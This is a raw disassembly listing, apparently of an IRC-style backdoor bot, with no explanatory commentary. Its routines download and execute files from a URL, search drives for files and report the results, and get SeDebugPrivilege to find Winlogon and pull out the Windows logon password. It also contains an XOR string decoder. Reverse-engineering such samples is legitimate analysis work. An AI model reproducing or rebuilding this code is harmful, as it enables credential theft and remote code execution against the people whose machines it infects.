push offset aDownloadOpened ; "[DOWNLOAD]: Opened: %s."
push eax
call sub_418D70
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
lea eax, [ebp+var_510]
push eax
call sub_4035E1
add esp, 24h
jmp loc_40555D
; ---------------------------------------------------------------------------
loc_405418: ; CODE XREF: sub_405084+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_432420
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_432420
fstp [esp+590h+var_590]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_418D70
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_405480
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
add esp, 14h
loc_405480: ; CODE XREF: sub_405084+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_4035E1
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_4189A0
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_4189A0
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset dword_449CE0
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_494330
cmp eax, edi
jnz short loc_405502
call dword_44B620 ; WSACleanup
call sub_409D2E
push esi
call ds:dword_49432C
loc_405502: ; CODE XREF: sub_405084+46A�j
lea eax, [ebp+var_148]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_40551C
; ---------------------------------------------------------------------------
loc_405510: ; CODE XREF: sub_405084+45�j
lea eax, [ebp+var_248]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_40551C: ; CODE XREF: sub_405084+48A�j
lea eax, [ebp+var_510]
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_405550
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
add esp, 14h
loc_405550: ; CODE XREF: sub_405084+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_4035E1
pop ecx
loc_40555D: ; CODE XREF: sub_405084+29C�j
; sub_405084+325�j ...
push [ebp+var_18]
call dword_44B6F4 ; InternetCloseHandle
push [ebp+var_48]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
sub_405084 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405576 proc near ; CODE XREF: sub_405084+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_405592
loc_405582: ; CODE XREF: sub_405576+1A�j
mov dl, byte_43E1B8
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_405582
locret_405592: ; CODE XREF: sub_405576+A�j
retn
sub_405576 endp
; =============== S U B R O U T I N E =======================================
sub_405593 proc near ; CODE XREF: sub_40C50A+2A6A�p
; sub_40C50A+2BC9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41A3E0
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_405593 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055AD proc near ; CODE XREF: sub_40465D+2DB�p
; sub_404A02+1B5�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_449CE4
push 0
push edi
call sub_4189A0
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_4055D2: ; CODE XREF: sub_4055AD+5B�j
; sub_4055AD+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_41A4B0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_41A440
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_405610
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4055D2
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4055D2
; ---------------------------------------------------------------------------
loc_405610: ; CODE XREF: sub_4055AD+4B�j
dec esi
mov eax, edi
loc_405613: ; CODE XREF: sub_4055AD+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_405622
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_405613
; ---------------------------------------------------------------------------
loc_405622: ; CODE XREF: sub_4055AD+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4055AD endp
; =============== S U B R O U T I N E =======================================
sub_40562C proc near ; CODE XREF: sub_4057E1+51�p
; sub_4057E1+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_44B720 ; GetDriveTypeA
sub eax, 0
jz short loc_40566F
dec eax
jz short loc_405669
dec eax
dec eax
jz short loc_405663
dec eax
jz short loc_40565D
dec eax
jz short loc_405657
dec eax
jz short loc_405651
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_405651: ; CODE XREF: sub_40562C+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_405657: ; CODE XREF: sub_40562C+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40565D: ; CODE XREF: sub_40562C+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_405663: ; CODE XREF: sub_40562C+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_405669: ; CODE XREF: sub_40562C+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40566F: ; CODE XREF: sub_40562C+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_40562C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405675 proc near ; CODE XREF: sub_4056BD+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_44B5BC
test eax, eax
jz short loc_4056AA
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_4056AA: ; CODE XREF: sub_405675+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_405675 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056BD proc near ; CODE XREF: sub_4057E1+17�p
; sub_415430+1F3�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_405675
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_405797
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_405797
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_405797
mov edi, 400h
push 0
push edi
push [ebp+var_14]
push [ebp+var_18]
call sub_41A530
push edx
push eax
call sub_4055AD
push eax
mov esi, 80h
push offset aSkb ; "%sKB"
lea eax, [ebp+var_198]
push esi
push eax
call sub_418EF0
add esp, 18h
push 0
push edi
push [ebp+var_C]
push [ebp+var_10]
call sub_41A530
push edx
push eax
call sub_4055AD
push eax
push offset aSkb_0 ; "%sKB"
lea eax, [ebp+var_118]
push esi
push eax
call sub_418EF0
add esp, 18h
push 0
push edi
push [ebp+var_4]
push [ebp+var_8]
call sub_41A530
push edx
push eax
call sub_4055AD
push eax
push offset aSkb_1 ; "%sKB"
lea eax, [ebp+var_98]
push esi
push eax
call sub_418EF0
jmp short loc_4057CA
; ---------------------------------------------------------------------------
loc_405797: ; CODE XREF: sub_4056BD+2C�j
; sub_4056BD+3B�j ...
lea eax, [ebp+var_198]
push offset aFailed ; "failed"
push eax
call sub_418D70
lea eax, [ebp+var_118]
push offset aFailed_0 ; "failed"
push eax
call sub_418D70
lea eax, [ebp+var_98]
push offset aFailed_1 ; "failed"
push eax
call sub_418D70
loc_4057CA: ; CODE XREF: sub_4056BD+D8�j
mov eax, [ebp+arg_0]
add esp, 18h
lea esi, [ebp+var_198]
mov edi, eax
push 60h
pop ecx
rep movsd
pop edi
pop esi
leave
retn
sub_4056BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4057E1 proc near ; CODE XREF: sub_4058B3+17�p
; sub_4058B3+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_4056BD
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed_2 ; "failed"
rep movsd
push eax
call sub_419360
add esp, 10h
test eax, eax
jnz short loc_405854
push ebx
push ebx
call sub_40562C
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_500]
push 200h
push eax
call sub_418EF0
add esp, 14h
jmp short loc_405888
; ---------------------------------------------------------------------------
loc_405854: ; CODE XREF: sub_4057E1+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_40562C
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_500]
push 200h
push eax
call sub_418EF0
add esp, 20h
loc_405888: ; CODE XREF: sub_4057E1+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
lea eax, [ebp+var_500]
push eax
call sub_4035E1
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4057E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4058B3 proc near ; CODE XREF: sub_40C50A+57CC�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_4058D4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4057E1
add esp, 10h
jmp short loc_405935
; ---------------------------------------------------------------------------
loc_4058D4: ; CODE XREF: sub_4058B3+9�j
push esi
push edi
push ebx
push ebx
call dword_44B630 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_416A10
pop ecx
mov edi, eax
push edi
push esi
call dword_44B630 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40592C
loc_4058F8: ; CODE XREF: sub_4058B3+77�j
push offset aA ; "A:\\"
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40591B
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4057E1
add esp, 10h
loc_40591B: ; CODE XREF: sub_4058B3+54�j
push esi
call sub_418E70
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_4058F8
loc_40592C: ; CODE XREF: sub_4058B3+43�j
push edi
call sub_417480
pop ecx
pop edi
pop esi
loc_405935: ; CODE XREF: sub_4058B3+1F�j
pop ebx
pop ebp
retn
sub_4058B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405938 proc near ; DATA XREF: sub_40BBCB+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_44D064
call dword_44B758 ; closesocket
call sub_4163B4
call dword_44B620 ; WSACleanup
call dword_44B620 ; WSACleanup
mov ebx, ds:dword_4942D8
push 64h
call ebx
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_4189A0
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_4189A0
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset dword_449D24
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_494320
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:dword_4942F8
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_494330
test eax, eax
jz short loc_4059FD
push 64h
call ebx
push [ebp+var_10]
mov esi, ds:dword_4942E0
call esi
push [ebp+var_C]
call esi
loc_4059FD: ; CODE XREF: sub_405938+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_449D1C
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_49432C
pop edi
pop esi
pop ebx
sub_405938 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A20 proc near ; DATA XREF: sub_40C50A+3D60�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_418E70
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_405A75
lea eax, [ebp+var_114]
push eax
call sub_418E70
pop ecx
mov [ebp+eax+var_115], bl
loc_405A75: ; CODE XREF: sub_405A20+3F�j
lea eax, [ebp+var_218]
push eax
push offset aFindfileSearch ; "[FINDFILE]: Searching for file: %s."
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_418EF0
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_405ABA
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40842D
add esp, 14h
loc_405ABA: ; CODE XREF: sub_405A20+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_405B38
push eax
lea eax, [ebp+var_49C]
push offset aFindfileFilesF ; "[FINDFILE]: Files found: %d."
push eax
call sub_418D70
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_405B18
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40842D
add esp, 14h
loc_405B18: ; CODE XREF: sub_405A20+D6�j
lea eax, [ebp+var_49C]
push eax
call sub_4035E1
push [ebp+var_10]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_405A20 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B38 proc near ; CODE XREF: sub_405A20+B9�p
; sub_405B38+9C�p
var_548 = byte ptr -548h
var_348 = byte ptr -348h
var_244 = byte ptr -244h
var_140 = byte ptr -140h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 548h
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_244]
push offset aS_1 ; "%s\\*"
push esi
push eax
call sub_418EF0
mov edi, ds:dword_49433C
add esp, 10h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_244]
push eax
call edi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_405BF1
loc_405B7E: ; CODE XREF: sub_405B38+B7�j
test [ebp+var_140], 10h
jz short loc_405BDF
cmp [ebp+var_114], 2Eh
jnz short loc_405BA2
cmp [ebp+var_113], 0
jz short loc_405BDF
cmp [ebp+var_113], 2Eh
jz short loc_405BDF
loc_405BA2: ; CODE XREF: sub_405B38+56�j
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_348]
push [ebp+arg_10]
push offset aSS_1 ; "%s\\%s"
push esi
push eax
call sub_418EF0
push [ebp+arg_14]
lea eax, [ebp+var_348]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405B38
add esp, 2Ch
mov [ebp+arg_14], eax
loc_405BDF: ; CODE XREF: sub_405B38+4D�j
; sub_405B38+5F�j ...
lea eax, [ebp+var_140]
push eax
push ebx
call ds:dword_494338
test eax, eax
jnz short loc_405B7E
loc_405BF1: ; CODE XREF: sub_405B38+44�j
push ebx
mov ebx, ds:dword_494334
call ebx
push [ebp+arg_C]
lea eax, [ebp+var_244]
push [ebp+arg_10]
push offset aSS_2 ; "%s\\%s"
push esi
push eax
call sub_418EF0
add esp, 14h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_244]
push eax
call edi
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_405C7B
loc_405C2C: ; CODE XREF: sub_405B38+141�j
lea eax, [ebp+var_114]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_548]
push [ebp+arg_10]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_418EF0
push 1
lea eax, [ebp+var_548]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 28h
lea eax, [ebp+var_140]
push eax
push esi
call ds:dword_494338
test eax, eax
jnz short loc_405C2C
loc_405C7B: ; CODE XREF: sub_405B38+F2�j
push esi
call ebx
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_405B38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C86 proc near ; DATA XREF: sub_40C50A+5238�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_4152DC
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_405CC5
cmp eax, 2
jz short loc_405CC5
push offset aFindpassOnlySu ; "[FINDPASS]: Only supported on Windows N"...
jmp loc_405E04
; ---------------------------------------------------------------------------
loc_405CC5: ; CODE XREF: sub_405C86+2E�j
; sub_405C86+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40B487
pop ecx
test eax, eax
pop ecx
jz loc_405DFF
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_49434C
mov esi, ds:dword_494348
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_44AF34, eax
call esi
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_44AF28, eax
call esi
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_44B138, eax
call esi
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_44AF30, eax
call esi
mov dword_44AF2C, eax
call sub_405E58
test eax, eax
mov [ebp+arg_0], eax
jz loc_405DD2
mov esi, ds:dword_494344
mov edi, 400h
mov ebx, offset dword_449F28
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi
push edi
mov edi, offset dword_44A728
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi
cmp [ebp+var_4], 1
push offset dword_44B140
push [ebp+arg_0]
jnz short loc_405D7E
call sub_405FE1
jmp short loc_405D83
; ---------------------------------------------------------------------------
loc_405D7E: ; CODE XREF: sub_405C86+EF�j
call sub_406188
loc_405D83: ; CODE XREF: sub_405C86+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_405DCB
cmp dword_44B140, 0
jnz short loc_405DB2
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push eax
call sub_418EF0
add esp, 18h
jmp short loc_405DE5
; ---------------------------------------------------------------------------
loc_405DB2: ; CODE XREF: sub_405C86+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_405DC2
call sub_4062BE
jmp short loc_405DC7
; ---------------------------------------------------------------------------
loc_405DC2: ; CODE XREF: sub_405C86+133�j
call sub_406355
loc_405DC7: ; CODE XREF: sub_405C86+13A�j
pop ecx
push eax
jmp short loc_405DD7
; ---------------------------------------------------------------------------
loc_405DCB: ; CODE XREF: sub_405C86+101�j
push offset aFindpassUnable ; "[FINDPASS]: Unable to find the password"...
jmp short loc_405DD7
; ---------------------------------------------------------------------------
loc_405DD2: ; CODE XREF: sub_405C86+B6�j
push offset aFindpassUnab_0 ; "[FINDPASS]: Unable to find Winlogon Pro"...
loc_405DD7: ; CODE XREF: sub_405C86+143�j
; sub_405C86+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_418D70
pop ecx
pop ecx
loc_405DE5: ; CODE XREF: sub_405C86+12A�j
push 0
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
call sub_40B487
pop ecx
pop ecx
push [ebp+var_8]
call ds:dword_494340
pop ebx
jmp short loc_405E12
; ---------------------------------------------------------------------------
loc_405DFF: ; CODE XREF: sub_405C86+4E�j
push offset aFindpassFailed ; "[FINDPASS]: Failed to enable Debug Priv"...
loc_405E04: ; CODE XREF: sub_405C86+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_418D70
pop ecx
pop ecx
loc_405E12: ; CODE XREF: sub_405C86+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_405E39
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40842D
add esp, 14h
loc_405E39: ; CODE XREF: sub_405C86+191�j
lea eax, [ebp+var_29C]
push eax
call sub_4035E1
push [ebp+var_18]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
sub_405C86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405E58 proc near ; CODE XREF: sub_405C86+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_494358
mov ebx, 100h
push edi
push ebx
push 8
call esi
mov edi, ds:dword_494354
push eax
call edi
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_44AF34
push ebp
push 0
call esi
push eax
call ds:dword_494350
push [esp+28h+var_14]
push 8
call esi
push eax
call edi
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword_44AF34
test eax, eax
jnz short loc_405F45
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_405F45
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_405F45
loc_405EE1: ; CODE XREF: sub_405E58+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_405F38
push 0
push 0
call dword_44AF28
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_44B138
test eax, eax
jnz short loc_405F29
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_41A5E0
pop ecx
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jnz short loc_405F5D
loc_405F29: ; CODE XREF: sub_405E58+AA�j
test edi, edi
jz short loc_405F34
push edi
call dword_44AF30
loc_405F34: ; CODE XREF: sub_405E58+D3�j
mov eax, [esp+28h+var_10]
loc_405F38: ; CODE XREF: sub_405E58+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_405EE1
loc_405F45: ; CODE XREF: sub_405E58+6D�j
; sub_405E58+7A�j ...
xor edi, edi
loc_405F47: ; CODE XREF: sub_405E58+17D�j
push ebp
push 0
call esi
push eax
call ds:dword_494350
mov eax, edi
loc_405F55: ; CODE XREF: sub_405E58+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_405F5D: ; CODE XREF: sub_405E58+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_405FC6
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_405F73: ; CODE XREF: sub_405E58+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_41A5E0
pop ecx
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jnz short loc_405FDA
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_41A5E0
pop ecx
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jnz short loc_405FB8
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_405FB8: ; CODE XREF: sub_405E58+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_405F73
loc_405FC6: ; CODE XREF: sub_405E58+10F�j
test edi, edi
jz short loc_405FD1
push edi
call dword_44AF30
loc_405FD1: ; CODE XREF: sub_405E58+170�j
mov edi, [esp+28h+var_4]
jmp loc_405F47
; ---------------------------------------------------------------------------
loc_405FDA: ; CODE XREF: sub_405E58+13C�j
xor eax, eax
jmp loc_405F55
sub_405E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FE1 proc near ; CODE XREF: sub_405C86+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_494370
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_40600A
